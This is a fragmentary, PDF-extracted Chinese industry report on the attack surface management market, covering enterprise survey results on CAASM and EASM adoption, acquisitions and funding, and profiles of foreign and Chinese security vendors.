40%的企业还没有购买 CAASM 产品; .未采购; .不满意,资产管理能力不能满足要求; .不满意 ,漏洞发现能力、漏洞优先级排序能力不能满足要求; .不满意,其它原因: .满意 图 17:被调研企业对现有 CAASM 产品的满意度 企业对现有 EASM 产品的满意度: 有 40%的企业对已购买的 EASM 服务不满意,主 要原因在于较多的漏报和误报,有 23%的企业对购买的 EASM 服务满意,而另有 37%的 企业还没有购买 EASM 服务; .未采购; .不满意,不能有效发现攻击面,漏报太多; .不满意 ,误报太多; .满意,能有效地在监管单位、攻击者之前发现漏洞并告警; EASM 产品的满意度 企业对攻击面管理产品集成威胁情报的满意度: 有 52%的企业对攻击面管理产品集成 威胁情报的效果不满意; 不满意; 满意; 图 19:被调研企业对攻击面管理产品集成威胁情报的满意度 企业对攻击面管理产品与安全运营平台集成的满意度: 有 52%的企业认为不满意, 难 以将攻击面管理产品集成到企业安全运营平台中, 有 19%的企业认为可以完美集成, 而有 29%的企业则认为没有将两者集成的需求; 19% 29% 52% 图 21:被调研企业认为现有攻击面管理产品的主要不足 企业采购攻击面管理产品的时间周期: 有 24%的企业表示将在一年内采购攻击面管理 42%的企业表示虽在关注产品但未列入当年预算,有 15%的企业则表示尚未考 虑; 15% 19% 24% 42% 已经建设; 已经在2023年计划中; 在考察过程中,尚未纳入2023年建设预算; 尚未考虑; 图 22:被调研企业采购攻击面管理产品的时间周期 企业建立攻击面管理体系的技术路线: 有 35%的企业希望建立 CAASM+EASM 一体 化的攻击面管理系统, 有 35%的企业认为应该先从 CAASM 入手, 而有 24%的企业认为先 从 EASM 开始。 35 % 6%的企业认为可以在 100 万人民币以上。 31 % 20万人民币以下 ; 20- 50万 人民币 ; 50- 10 0万人民币 ; 10 0万人民币以上 ; 图 24:被调研企业购买攻击面管理产品的预算投入 近三年,国外攻击面管理市场的主要并购项目如下表。从并购方情况看,既有 IT 巨头, 包括 Microsoft 、 IBM 、Google(已收购的 Mandiant 在 2021 年收购攻击面管理厂商 Intrigue),也有网络安全巨头,包括 Palo Alto 、CrowdStrike。从被并购方的情况看, 业务类型非常一致,全部为 EASM 和 TI 方向。目前还没有看到 CAASM 方向的并购。 结合并购的具体内容可以看出, 头部厂商通过对 EASM 厂商的收购, 将外部攻击面管 理技术与现有安全产品进行集成, 在传统安全, 例如: 端点安全、 XDR、威胁情报、电子 邮件安全等产品上,扩展对企业外部攻击面风险发现与监测的功能。 并购 时间 项目 名称 创立 时间 业务 类型 并购方 金额 并购背景说明 2022. 11 SpiderFoot 2005 TI EASM Intel 471 未披露 Intel 471 TITAN 平台可为全球网络安全企业和专业人员 提供专业的网络犯罪情报, SpiderFoot 是 github 上一 个开源网络情报工具,通过整合大量 OSINT 数据源,采 集互联网 ip、域名、电子邮件、电话号码等信息,形成 对企业外部攻击面的监测。收购 SpiderFoot 可以对 Intel 471 情报方案形成互补和增强。 2022. 10 Hardenize 2016 EASM Red Sift 未披露 Red Sift 专注于电子邮件和品牌保护, Red Sift 平台提 供入站和出站电子邮件保护,阻止钓鱼邮件等风险。 Hardenize 外部攻击面管理技术可以帮助 Red Sift 不 2022. 9 2022. 6 Randori 2018 EASM IBM 未披露 Security QRadar 的扩展检测和响应 (XDR) 功能相集 成。通过将 Randori 的洞察力输入 QRadar XDR,安 全团队将能够利用实时攻击面可见性进行智能警报分 类、威胁搜寻和事件响应。 2022. 1 SecurityTrails 2017 EASM Recorded Future 6500 万 美元 SecurityTrails 收集、存储、维护当前和历史的互联网 记录,包括域名记录、注册数据和 DNS 信息等,可为 Recorded Future 威胁情报平台提供数据,两家公司 从 2018 开始成为技术合作伙伴。 ;; 2021. 8 RiskIQ 2009 EASM TI Microsoft 5 亿 美元 通过收购全球威胁情报和攻击面管理领域品牌 RiskIQ, 增强 Microsoft 365 Defender 、Microsoft Azure Defender 和 Microsoft Azure Sentinel 等产品对多 云、混合云环境下威胁保护、检测和响应的能力。收购 RiskIQ 1 年后,微软推出 Defender 外部攻击面管理 (EASM) 和 Defender 威胁情报产品。 2021. 8 Intrigue 2019 EASM Mandiant (Google 已收购) 1230 万 美元 将 Intrigue 集成到 Mandiant Advantage SaaS 平台 中,实现外部攻击面管理技术与 Mandiant Advantage 平台威胁情报、安全验证和自动防御功能的融合,扩展 为客户提供的专业知识与情报。 2020. 12 Expanse 2012 EASM Palo Alto 8 亿 美元 Palo Alto Networks Cortex™ 产品套件提供了针对企 业内部可见性、威胁、检测和响应的功能,收购 Expanse 后,会将其互联网资产发现和数据归属等能力 与 Cortex 集成。 景的看好。 14 13 12 11 10 9 8 6 4 4 3 2 0.87 1.54 0.76 0 2018 2019 2020 2021 2022 — 融资企业数 — 融资事件(单位:次) — 融资金额(单位:亿美元) (说明:数据基于公开信息整理) 图 25:2018-2022 年国外攻击面管理赛道融资情况 (一) 国外厂商 1. Randori( EASM) Randori 成立于 2018 年, 是一家以黑客思维为主导的进攻型公司。 Randori 攻击面 管理解决方案使用了更符合现实的攻击逻辑, 攻者视角在传统漏扫、POC 等方式上深度结 合了 ATT&CK 、 BAS 和红队技术,通过使用 Randori 自有 Target Temptation 风险评分 模型, 将攻击方法与目标资产的业务价值、业务影响以及现有安全控制和补救措施相结合, 识别出对攻击者最有吸引力的风险,从而构建实时的高优先级风险清单,同时基于双向 API 集成, Randori 可以将攻击面发现能力快速嵌入到 SIEM 、SOAR 等生态系统。 2022 年 6 月, IBM 完成对 Randori 的收购,并将 Randori 攻击面管理软件与 IBM Security QRadar 扩展检测和响应(XDR)方案进行集成。 2. UpGuard( EASM) UpGuard 成立于 2012 年, 作为一家数据驱动型公司, UpGuard 提供外部攻击面管 理和轻量级数字风险保护 SaaS 服务。通过每天 8000 亿次数据采集, UpGuard 可以识别 方向, 目标是要解决一个看似普通但确一直无法完美解决的问题, 即如何全面获得企业资 产的可见性视图, 因此 Axonius 并未走大而全的解决方案路线, 而是聚焦在资产清点、资 产运行及安全状态的监控。 做为一个行业性平台, Axonius 在无需部署任何代理的情况下, 通过与包括网络、端 点、身份、漏洞、云管理平台等不同类型超过 550+Adapter 信息源的对接来获取资产信 息, 实现细粒度的资产类型识别与唯一性标识, 帮助企业完成资产可视化与资产运行状态 的安全监控。同时, 针对已识别的资产漏洞风险, Axonius 会依据资产重要性、漏洞潜在 影响和已识别的威胁来确定漏洞修复的优先级, 并与多种安全节点进行深层的动作调用以 实现风险处置。 2022 年 3 月, Axonius 以 26 亿美元估值获得了 2 亿美元的 E 轮融资,历史融资额 达到 6.65 亿美元。 4. Balbix( CAASM) Balbix 成立于 2015 年, 产品定位为网络安全态势自动化平台(CAASM 方向) ,使 用 AI 实现自动化网络风险发现、优先级排序、安全缓解与风险量化。 Balbix 通过探针、 Agent、第三方数据源集成采集资产数据, 在风险发现中, 通过分析漏洞工具、BAS 工具 、 安全控制工具的结果和多种威胁数据源, 结合自有风险度量模型进行体系化综合的风险量 化分析并进行后续安全编排与缓解工作 。 Balbix 基于“风险=可能性(脆弱性、暴露面、 威胁、缓解控制) *影响(业务关键度) ”模型, 将网络安全风险量化为数据指标, 可以快 速帮助安全运营团队做出防御决策。 Balbix 在 2022 年 3 月完成 C 轮 7000 万美元融资,历史融资额超过 1 亿美元。 5. CTM360( DRPS 、 EASM) CTM360 成立于 2014 年,总部位于巴林,作为老牌数字风险保护品牌, CTM360 在 2021 年推出 EASMSaaS 服务, 并与 DRPS 进行整合, 可以为企业提供外部攻击面管理、 安全评级、网络威胁情报、深网暗网监控、品牌保护和反网络钓鱼、第三方风险监控、社 交媒体欺诈监控、数据泄漏保护、Takedown 等服务。 CTM360 提供了开箱即用、配置灵 活的交互系统,并在数据可视化和威胁风险分析展示上提供一流的用户体验。 6. Cycognito( EASM) Cycognito 成立于 2017 年, 是攻击面管理领域初创公司, 旗下 CyCognito 平台强调 以攻击者角度为设计原则, 通过将市场上先进的 EASM 功能与自动化测试/BAS 相结合来 提供攻击面保护, 以发现攻击者最有可能用来危害组织的最小攻击路径。平台在业务上下 文关联阶段使用了机器学习、自然语言处理和图形数据模型等创新技术; 在响应修复阶段 支持与 SIEM 、 ITSM 、CMDB 和通信软件进行联动;平台支持常见的安全框架和安全合规 等方面的检查及有效性验证能力。整体来看, 平台在 EASM 领域能力覆盖较全面, 但在对 于暗网、深网和数据泄露等方面的监控能力没有体现, 同时产品技术及运营方面的成熟度 有待考验。 7. Tenable( CAASM 和 EASM) Tenable 成立于 2002 年, 属于漏洞技术驱动型公司, 作为老牌的漏洞管理厂商, 旗 下 Tenable One 漏洞管理平台整合漏洞管理、 web 应用安全、云安全、身份安全及外部 攻击面管理等功能模块,把资产、漏洞和风险进行关联分析, 一定程度上实现 CAASM 功 能。产品在漏洞可视化及攻击路径分析等方面具备一定优势,但在资产和漏洞发现阶段, 主要还是以主动扫描方式获取,没有明确可集成其他产品适配器的功能。此外, Tenable.asm 作为 Tenable One 功能模块聚焦在 EASM 方向, 是业界首个完全集成到漏 洞管理平台中的外部攻击面管理 (EASM) 解决方案;产品可无缝启动对未评估资产的新 扫描,以扫描盲点并全面覆盖整个外部攻击面。 8. Palo Alto Networks( EASM) Palo Alto Networks 成立于 2005 年,作为老牌综合型网络安全厂商,在 2020 年以 8 亿美金收购网络安全服务商 Expanse 后,将其互联网资产发现和数据归属等功能与 Cortex 产品套件集成。旗下攻击面管理产品 Cortex Xpanse 产品推出较早,无论在品牌 知名度、客户认可度、技术和方案成熟度方面都具备一定优势。核心优势主要在全球互联 网资产与漏洞发现的全面性及实效性, 以及风险关联分析方面, 同时产品作为 PaloAlto 旗 份和访问资产、资产安全合规等方面能力。同时, JupiterOne 支持与客户现网中的 XDR、 SOAR、SIEM 等产品联动, 以获得风险和优先级的综合视图, 实现统一平台威胁态势管理。 10. SOCRadar( EASM 和 DRPS) SOCRadar 成立于 2018 年, 属于威胁情报驱动型公司, 旗下产品扩展威胁情报平台 结合了外部攻击面管理 (AttackMapper)、数字风险保护服务 (RiskPrime)和网络威胁情 报 (ThreatFusion)功能模块,实现一站式解决方案。借助威胁情报技术优势,产品在 DRPS 方面具备一定优势, 特别是针对暗网、深网及数据泄露等方面的覆盖较全面。在 EASM 方 向, 主要针对 WEB 和 DNS 监控方向较为深入, 资产上下文关联及攻击路径可视化等方面 的特性有待增强。 11. CrowdStrike( EASM) CrowdStrike 是全球知名的网络安全龙头厂商, 主打的云原生终端安全产品是近年来 终端类安全产品用户数增长最快的产品之一。公司的 Falcon 云原生架构,具有可扩展性 和适应性, 迭代升级迅速; 通过 SaaS 订阅方式集成 8 大类别(22 个云模块):包括端点安 全、云安全、托管服务、安全&IT 运营、威胁情报、身份保护、日志管理, 且推出 PaaS 安 全平台 CrowdStrike Store,让第三方合作伙伴能够快速创新,构建和部署新的云模块, 实现 SaaS+PaaS 的完整生态。这不断冲击传统安全厂商的市场份额。 2022 年, crowdStrike 收购以色列安全厂商 Reposify Ltd.,补充外部攻击面管理及 威胁情报能力。于 2022 年 9 月 20 日推出外部攻击面管理功能产品, 作为 Falcon 平台的 重要补充。CrowdStrike 认为 EASM 是企业实施零信任策略的基础, 在数字资产发现、企 业上云、跟踪下属公司安全状态等场景下帮助客户。功能包括持续的暴露面监测、风险优 先级排序及修复指引。为客户实现 7*24 小时持续暴露面监测,结合资产类别、 CVE 评分 等因子做综合优先级排序, 最后结合行业最佳实践生成处置建议手册, 帮助客户处置风险。 12. Noetic Cyber( CAASM) Noetic Cyber 公司成立于 2020 年, 2021 年 7 月获得 A 轮 2000 万美元融资。产品 架构开放, 接收 IT 系统管理中心和 CMDB,云平台, 容器和 VM 基础设施, 等系统数据信 息构建一个持续更新的来源, 通过图形数据库呈现给客户。通过实时分析, 帮助客户完善 端点安全、漏洞管理、 IT 系统管理等工作流程。提供完整的资产可见性, 实时的安全风险 洞察,并给出自动化补救措施建议。 13. Sevco Security( CAASM) Sevco Security 成立于 2020 年, 产品以云原生网络资产攻击面管理(CAASM)为核 心,同 Axonius 和 JupiterOne 的设计理念相似, Sevcon 攻击面管理平台不做主动式资 产发现, 其通过本地 API 与现有资产相关系统集成, 获取客户资产信息清单。其优势在于 基于 API 的集成只需几分钟, 不需要安装代理或部署扫描设备, 也不需要对客户的环境进 行任何特殊访问。同时, Sevco 平台具备独创的资产关联引擎可识别源系统资产的关键属 性, 自动创建并持续处理重复的资产信息,通过分析和汇集不同的资产数据源来构建实时 资产视图。此外, 平台支持资产遥测功能来实时监控资产状态并生成资产和属性更改事件, 对事后调查溯源至关重要。 14. Brinqa( CAASM) Brinqa 公司创立于 2008 年, 总部位于德克萨斯州奥斯汀, 他的统一风险管理平台有 本地和 Saas 两种形式为客户提供服务,平台对数百个业务及数据源开放了接口,通过建 立智能分析引擎实现对大量数据的收集、关联、分析、响应, 并建立了风险图谱模型, 可 实现资产发现、业务上下文关联、风险分析管理、风险优先级排序、风险处置等全流程风 险监管工作, 为客户提供实时风险分析、自动化风险评估、优先补救和可行的见解和改进 建议。 15. Reflectiz( EASM) Reflectiz 成立于 2017 年, 为填补应用程序安全和第三方风险管理工具方面的空白而 创立,公司旨在通过开发一个映射整个数字供应链并分析每个组件的“WWW (哪些、什 么、在哪里) ”的解决方案来确保 Web 应用程序的安全。 Reflectiz 并于 2019 年发布攻击面管理平台产品。攻击面管理平台以应用程序安全和 第三方风险管理为切入点, 通过创新的远程沙箱, 模拟用户和攻击者行为以监控客户网站, DigitalShadows 主要为客户提供威胁情报服务,推出“探照灯”产品,该产品提供 可操作的威胁情报,可适应特定风险状况和偏好;并通过数据分析,结合超过 1000 条规 则和分析师的专业知识, 以确保检测与不断变化的威胁景观保持同步。 “探照灯”还能将 情报与资产联系起来, 在风险评估中使用资产价值, 并提供透明的风险评分, 以快速识别 重要内容,更快地做出更好的决策。 18. CyberInt( DRPS) CyberInt 公司提供较为全面综合的解决方案, ArgosEdgeM 攻击面监控和高级威胁 情报平台协同工作, 提供持续的发现和监控, 提供对组织面临的恶意行为者的威胁的完全 可见性。 核心功能包括攻击面管理: 资产发现、漏洞扫描、风险优先级管理; 威胁情报: 包括 暗网、社交媒体及品牌监控; 取证画布: 通过广泛的 ioc 上下文链接, 将多个服务集成到 统一的调查平台中, 以支持各种类型的连接, 包括威胁情报、WHois 服务、被动 DNS、社 管理、应用程序代码审查、应用程序安全、红队、应用程序安全程序开发、Web 安全、信 息安全等。其在攻击面管理方面的核心优势是可以将 20 多年的渗透测试经验,和全球的 专家团队的技术能力融入到攻击面管理技术平台。 20. Cyberpion( EASM) Cyberpion 是一家以色列的网络安全公司,成立于 2016 年,其 2023 年人员规模在 60 人上下。其主营业务是外部攻击面管理, 其他业务还涉及生态系统安全、供应链风险评 估、第三方风险评估、云安全、在线安全威胁管理、网络安全威胁管理、网络安全风险管 理和 Web 应用安全管理等。 21. ImmuniWeb( EASM) ImmuniWeb 是一家瑞士的网络安全公司,成立于 2019 年,其 2023 年人员规模在 30 人上下。其主营业务是攻击面管理, 其他业务还涉及 Web 应用程序安全、渗透测试和 攻击面测试、云安全、攻击面管理和威胁建模等。 23. Coalfire( EASM) Coalfire 是一家美国的网络安全公司, 成立于 2001 年, 其 2023 年人员规模在 1100 人上下。其主营业务为合规服务、云安全、渗透测试、应用安全、托管服务、脆弱性管理 以及战略、隐私和风险服务。 24. LookingGlass( EASM) LookingGlass 是一家美国的网络安全公司, 成立于 2009 年, 其 2023 年人员规模在 160 人上下。其主营业务是威胁情报和威胁防御, 其他业务还涉及高级恶意软件、DNS 安 全、开放安全平台和 APT 研究等。 25. RunZero( CAASM) RunZero 是一家美国的网络安全公司,成立于 2018 年,其 2023 年人员规模在 80 人上下。其主营业务是资产清单和网络可视性解决方案。 26. BrandDefense( DRPS) BrandDefense 是一家美国的网络安全公司,成立于 2019 年,其 2023 年人员规模 在 50 人上下。其主营业务是综合防御和网络威胁情报, 其他业务涉及漏洞管理和攻击面。 (二) 国内厂商 1. 360 数字安全集团 360 有多条产品线和能力线与攻击面管理相关: 360 所收购的数字观星团队的企业网 络资源测绘系统观星台、 360 自身研发的 Quake 网络空间资源测绘系统以及 360 漏洞研 究团队。 360 对攻击面管理产品的理念是, 将外部攻击面管理与内部攻击面管理二者结合, 从 企业内、外网双重视角查看企业资产、掌握资产的暴露情况、风险情况、访问路径、保护 措施,从而支撑安全运营工作的有效开展。 产品的实现方案也是围绕内外部攻击面一体化展开: 首先有一个探针层和采集层, 通 过主动的资产扫描、漏洞扫描,以及对接 CMDB、其它安全软件/设备采集资产与漏洞信 息,然后将数据存储和进行标准化融合加工处理, 在数据分析层完成资产变更感知监控、 未知资产分析加工、资产/漏洞标签、资产漏洞重要性评价、业务/应用重要性评价、资产 /应用/业务/组织风险评价、资漏碰撞、漏洞真实性验证、访问关系挖掘。在数据分析能力 支撑下, 形成资产管理、漏洞管理、风险管理能力, 支撑更上层的攻击面管理动作: 业务 资产逻辑拓扑、攻击路径推断、攻击面资产图谱、攻击面风险分析。这些能力可以支持用 户的一些专项行动, 如资产盘点、外部攻击面排查、攻击面资产图谱、攻击面风险分析等。 在外部攻击面上,采用 360 云端大脑的数据, 对外部攻击面做整体的测绘, 然后再把 这个数据落到本地 。所有的资产的模板和风险的模板是可配置的, 不同的模板适用于不同 的管理场景。 以看见为中心, 建立攻击面的运营体系:看见资产, 看见漏洞, 看见风险, ,把资产、 漏洞和风险统一生成攻击面,然后去有效评估攻击防护措施。 目前 360 攻击面管理产品共有 4 条产品线: u 销量最大, 从数字观星 2016 年开始研发的 “观星台”演进而来的 “ 360 资产与 漏洞检测管理系统(天相-标准版) ℽ ; u 面向集团型企业客户的 “ 360 信息资产安全统一管理平台(天相-旗舰版) ℽ ; u 面向中大型金融、央企、政府客户的 “ 360 漏洞管理系统(星规) ℽ , 天相旗舰 版和星规的技术底层是相同的。 u 定位于中型客户的 “ 360 互联网攻击面监控系统(天相-SaaS 版) ℽ 360 自身研发的网络资源测绘系统 Quake 、360 的漏洞研究团队在其中都是作为能 力提供者贡献资产测绘能力、漏洞能力、威胁情报能力。 360 的特长是拥有丰富的资产情报(包括 DNS 情报、 Quake 互联网测绘情报、数据 泄露情报及暗网检测情报等)、资产指纹信息、大量的 POC/漏洞情报,尤其是信创的漏 洞情报, 历年实网攻防演习的漏洞, 以及在移动应用侧的微信资产测绘能力。在实施模式 上,可以为用户提供安全运营服务支持。 2. 华顺信安 开始做外部攻击面管理 EASM 产品 FORadar,由于用户有外部、内部资产的关联问题, 产生对 CAASM 的需求,为满足用户需求而进入内部攻击面管理 CAASM 市场,推出 FOBrain。但华顺信安一直对自身的产品边界保持比较谨慎的态度,依旧避免进入对安全 事件收集、响应功能,聚焦在资产与漏洞相关。 产品的部署形态, FORadar 可以支持 SaaS 服务与本地化部署两种形态, FOBrain 则 是本地部署。 3. 华云安 华云安是 2019 年 7 月才创立的公司 ,初期定位于漏洞研究、开发漏洞管理产品、 人 工智能赋能的攻防对抗。 从 2021 年 9 月份开始转攻击面管理 ,依靠基于知识图谱的情报 协同技术的 EASM 产品“灵知 Ai-Radar”,基于云原生技术做的 CAASM 产品“灵洞 Ai- Vul”,以及自动化渗透测试 BAS 产品“灵刃 Ai-Bot”。三款产品采用“灵洞” 的云原生 平台构架, 统一的开发平台不仅可以减少公司的技术管理开销, 可以容器化部署更带来的 领先的灵活性。 华云安的技术优势主要在做为国家漏洞库支撑单位而获得的漏洞情报能力、攻防能力、 知识图谱与人工智能能力。在竞争策略方面, 对国防安全客户, 通过情报和作战对抗, 在 漏洞库和战机捕获方面建立竞争优势; 对关基保护客户, 主动防御和溯源预警方面建立竞 争优势;在企业安全方面,通过未知资产梳理、漏洞扫描。 产品的交付模式上, 灵洞与灵刃采用本地交付, 灵知是 SaaS 方式交付, 因为采用统 一的云原生架构,三款产品都实现了通过许可证即可简单交付的方式。 4. 魔方安全 2015 年, 魔方安全由 Cubesec 团队在深圳创立, 成立 1 年后, 魔方安全便推出了基 于 SaaS 模式的互联网安全监控平台, 并为某 TOP 级金融客户提供互联网暴露面风险监控 服务。 成立 7 年来魔方安全始终专注于攻击面管理领域的产品研究与技术创新, 目前可以提 供 EASM 和 CAASM 两种产品。魔方安全 2020 年首创数字资产测绘理念,实现对移动端 公众号、小程序、网盘文库、暗网、github 敏感代码等数字资产的识别和监控, 并以此打 造基于 SaaS 模式、且自动化程度较高的 EASM 产品, 在金融行业具有较高的客户覆盖和 口碑。在 CAASM 产品上,魔方安全融合了国外厂商 Axonius 和 Sevco 的开放性理念, 通过对数十种资产信息数据源的对接, 实现对资产可见性和安全风险的全面观测, 在资产 信息整合与关联分析、攻击路径分析与可视化方面具有比较扎实的技术积累。 5. 盛邦安全 盛邦安全从 web 应用安全领域出发,目前已成为聚焦漏洞及脆弱性检测、应用安全 攻击面以及供应链安全的风险评估。在 CAASM 方面,盛邦安全在 2017 年便推出了网络 安全资产治理平台 RayGate,目前采用主、被动测绘技术可以实现对企业内部 IT 资产、 API 资产、开源组件、僵尸资产以及合规资产外连的识别,达成企业内部资产的快速盘点 与收敛。在 DRPS 方面,依托于自身互联网敏感信息监测系统 RaySIN,通过 SaaS 订阅 模式,盛邦安全可以为企业提供针对敏感信息泄漏、代码泄漏、钓鱼网站、移动端 APP/ 公众号/小程序、暗网、个人隐私信息等多维度数字资产的风险监测服务, 并且盛邦安全认 为 DRPS 对于国内的市场环境来说, 如果仅定位于包装成独立的产品放手给客户使用, 将 无法真正体现其产品价值,只有产品+服务的结合才会达成更好的客户体验。 目前盛邦安全攻击面管理产品的客户数量已达到数百家, 特别在教育、能源、运营商 以及某特殊行业,产品与客户实际业务场景已形成深度的融合。 6. 长亭科技 长亭科技在 2022 年 9 月发布了定位于 EASM 方向的云图(Cloud Atlas)攻击面管 理运营平台。该产品由猪猪侠(王昱) 主导研发, 做为前乌云网排名第一的白帽子、阿里 云先知平台的领航者、阿里云整体云平台与产品安全负责人、长亭科技安全技术副总裁, 猪猪侠对攻击面收敛和自动化安全运营方面具有非常丰富的经验。 立足于长期在攻防渗透领域的投入与累积, 长亭云图平台在攻击者视角的确立和运用 上有着比较深刻理解和体现, 并基于漏洞攻击面、数字资产攻击面、社会工程攻击面 3 个 维度进行风险研判与管理。特别在漏洞风险中, 通过整合其它多产品底层数据、自动化以 及社区情报能力, 并结合多年渗透测试经验, 构建了面向实战视角、符合真实攻击逻辑的 风险分析方法。除此外, 长亭在攻击面管理整体方案中也可以提供面向内网资产攻击面管 理(CAASM)的产品洞鉴(X-Ray)。 云图产品发布至今不足半年, 已试用于数十家大中型客户, 产品未来的目标客户将定 位于参与实网攻防或资产规模较大的客户。长亭科技认为没有实战需求或资产规模小将无 法凸显其产品价值。 7. 云科安信 云科安信公司是一家创立之初就定位于外部攻击面管理的公司, 创始人金飞是做网络 攻防背景,曾在 HP 、 F5 等外企工作。公司有攻防实验室做漏洞 POC 研究支撑,推出的 “ 白泽”攻击面管理产品,以 EASM SaaS 服务为主,借助运营商合作渠道,已获得上千 家客户,以中小企业为主。 与业内厂商比拼 POC 数量的竞争路线不同,云科安信认为保持 1000 个左右的 POC 就可以满足攻击面管理的需求,维护更多数量的 POC 并无太大必要。 云科安信目前主要通过和运营商合作, 以运营商的品牌为用户提供攻击面管理及攻击 防护服务, 目前已服务数千家企业, 以中小企业为主, 公司也已经开始组建销售队伍, 开 斗象科技在 2022 年末发布了面向企业攻击面检测与管理的安全平台 APTP,APTP 平 台是目前市场中为数不多的将网络资产攻击面管理(CAASM)与外部攻击面管理(EASM) 整合的产品。在资产梳理上, APTP 平台可以识别比较丰富的企业内外网资产信息,包括 传统 IT 资产、云资产、物联网资产、移动端资产、 API 资产、企业及员工的数字资产等, 并支持打通内外网资产映射关系,除此外, APTP 还以动态爬虫和辅助对抗手段,对不同 环境中运行的应用程序、服务组件、 API 等应用级资产进行更细粒度的识别,提取到包括 支付卡信息(PCI)、个人身份信息(PII)、健康信息(ePHI)以及 GDPR 等信息。在风 险分析方面, APTP 平台提供针对漏洞风险、数据泄漏风险、供应链风险、证书风险、配置 错误风险、钓鱼风险等多维度风险分析策略, 并结合多种渗透测试方法与自动化策略编排, 对风险与业务的重要性进行综合分析与风险优先级排序, 最终形成攻击路径推演与攻击面 可视化呈现。依托于漏洞盒子, APTP 平台在漏洞情报和 POC 方面也具有一定数据基础。 APTP 目前客户主要涉及金融和新零售行业, 斗象科技认为从目前市场沟通和 POC 情 况来看,未来 APTP 在客户行业与应用场景上将具备广泛的适用性。 9. 绿盟科技 绿盟攻击面管理平台以网络空间测绘平台、测绘探针、攻击面管理服务和 MDR 服务 组成,方案主要针对企业互联网资产暴露面和敏感信息泄漏情况进行风险监测,定位于 EASM 方向。通过持续 7 年在网络空间测绘方面的研究与数据积累, 并结合自身在攻防对 抗方面的经验, 绿盟攻击面管理平台可以帮助客户掌握外部资产信息, 包括识别企业高危 主机、恶意行为主机、幽灵资产等异常资产, 全面实现企业互联网资产风险监测与暴露面 收敛。同时, 该方案也可以对企业在网盘、文库、Github 代码平台、暗网中泄漏的敏感信 息以及移动端 APP、小程序、微信公众号等资产进行稽查。 该平台可以 SaaS 和私有化方式部署, 目标客户定位于重保单位、监管机构以及企业 级客户, 使用场景包括资产风险态势监测、挖矿专项治理、资产归属识别以及风险资产定 位。 10. 未岚科技 未岚科技是一家以攻击面管理为创业方向的初创网络安全公司, 创始人王金成有从事 SIEM/SOC 类产品开发背景, 有较强的大数据系统的应用开发经验, 同时具备甲方、乙方 的工作经验。 未岚科技同时提供 CAASM 、 EASM 和 DRPS 的能力,产品通过 API 接口可与数十种 资产相关系统/设备的数据进行对接和采集。特长在多源资产信息的融合及资产上下文分 析, 底层采用图数据库支撑, 并发明了 ASQL 语言, 可实现复杂的资产查询。同时, 在资 公司定位在 DRPS,同时具备 EASM 和 CAASM 能力,在政府机构、金融、电信都已树立 起标杆案例。 在 CAASM 领域, 公司支持多种识别方式, 主要通过种子录入方式对资产(IP、域名、 端口、协议、操作系统、指纹等) 进行快速的自动化探测识别, 并可进行高效精确的时序 指纹识别, 同时可通过绘制资产拓扑图、概览图、图库等方式全面展示资产情况。由于以 BAS 起家, 在漏洞方面螣龙安科支持较多的 1day 漏洞的 POC,大幅降低了新漏洞的可被 利用性, 而 BAS 系统也支持多攻击向量的安全性模拟检测及漏洞优先级评估, 并提供漏洞 修复指南。在 EASM 方面,螣龙安科通过爬虫抓取的方式,及支持文档平台、暗网平台、 数据泄露论坛、代码仓库、搜索引擎等方式监测用户的外部攻击面情况。螣龙安科在 2021 年启动了全球化的安全社区, 目前有近万名白帽黑客在持续和公司进行高频交互, 帮助进 一步完善产品。 12. 零零信安 零零信安是一家从暗网信息监测切入攻击面管理市场的厂商, 创始人王宇曾任知道创 宇 Zoom Eye 产品的负责人。 零零信安提供暗网信息监测服务,通过 0.zone 网站为客户提供自己组织或目标组织 所泄露在暗网上的数据、身份等可用来进行对组织 IT 设施进行攻击的信息。除了直接为最 知道创宇在 10 多年的发展过程中形成了政府、电信运营商、金融、电商、教育、新 闻媒体、直播、棋牌游戏、大型企业、中小型企业等多个行业的安全解决方案, 公司也拥 有较齐全的资质。 网络资源测绘与漏洞, 是攻击面管理的两个基础能力, 知道创宇有做攻击面管理的良 好的基础, 但近年来公司在产品的创新能力上有所下降, 但依然是攻击面管理方面的玩家 之一。 14. 墨云科技 墨云科技是主打网络智能攻防的厂商,主要产品是虚拟黑客机器人(VackBot)。 VackBot 从攻击者的视角出发,通过融合 AI 引擎与黑客攻击技术,实现用机器程序自动 化模拟黑客攻击行为, 自主规划攻击路径和攻击方法, 为用户提供针对各类 IT 资产的资产 发现、漏洞挖掘、漏洞验证以及利用漏洞进行扩展等攻击行为。 墨云推出的入侵和攻击模拟系统 VackBAS,内置 2000 多个模拟黑客攻击和入侵行为 现, 漏扫归一化, 自动化渗透和攻击模拟等产品集成到了一起, 除了墨云自己的产品, 还 可以集成其它安全公司的漏扫产品和资产管理平台,产品采用本地部署方式。 墨云的 AI 引擎除了逻辑调度外还引入多种机器学习算法,包括图像识别类算法(如 CNN ,KNN 等) 、特征识别与分类算法(如 NB ,CNN,A3C ,KMeans 等) 、决策类算 法(如 NB , DNN)等等。 AI 技术在网络攻防中的应用一直是人们努力的方向, 目前还有许多问题有待解决, 离 成熟还有很一定距, 但在提高工作效率、提升响应的速度方面已经在金融、运营商和关基 行业得到了验证,相信随着技术进步,会有更好的价值体现。 15. 灰度安全 灰度安全是一家以 BAS 和 VPT 为创业方向的公司, 其开发的产品先知-智能风险评估 系统是一款聚焦风险度量的专家级平台, 是一款聚焦风险度量, 持续验证防御措施有效性 的平台, 通过攻击场景构造和攻击向量编排技术, 实现控制措施及过程的验证和风险态势 的度量, 并且可以对接外部态势感知、作战指挥等系统实现风险度量集中可视化呈现、风 微步在线凭借多年来在情报生态领域积累的数据基础打造了 OneRisk 外部攻击面管 理 SaaS 平台,定位于 EASM 方向。做为数据驱动型平台, OneRisk 以网络空间测绘数据、 威胁情报和漏洞情报数据、全站爬虫数据为基础, 对企业互联网资产和数字资产进行全面 梳理和风险排查,在资产漏洞风险发现中, OneRisk 坚持聚焦 0day 和 1day 等高可利用 漏洞, 提供针对最新高危漏洞的快速检测与响应能力。除此外, OneRisk 可以针对互联网 文库、代码平台、邮箱、暗网中的数字资产提供数据泄漏风险管理与人工应急处置服务。 17. 天际友盟 天际友盟是 2015 年 6 月成立的威胁情报供应商,同年 10 月作为创始成员单位之一 成立烽火台安全威胁情报联盟, 陆续发布 RedQueen 安全智能服务平台、Alice 威助溯源 平台、 SIC 安全情报中心、 Leon 威胁情报网关,于 2019 年开始进入数字风险防护领域, 从业务规模上, 2022 年天际友盟 DRP 服务的收入已经超过威胁情报的数据订阅服务 收入(未包括 TIP/TIG 类威胁情报产品收入)。 18. 雾帜智能 雾帜智能自 2019 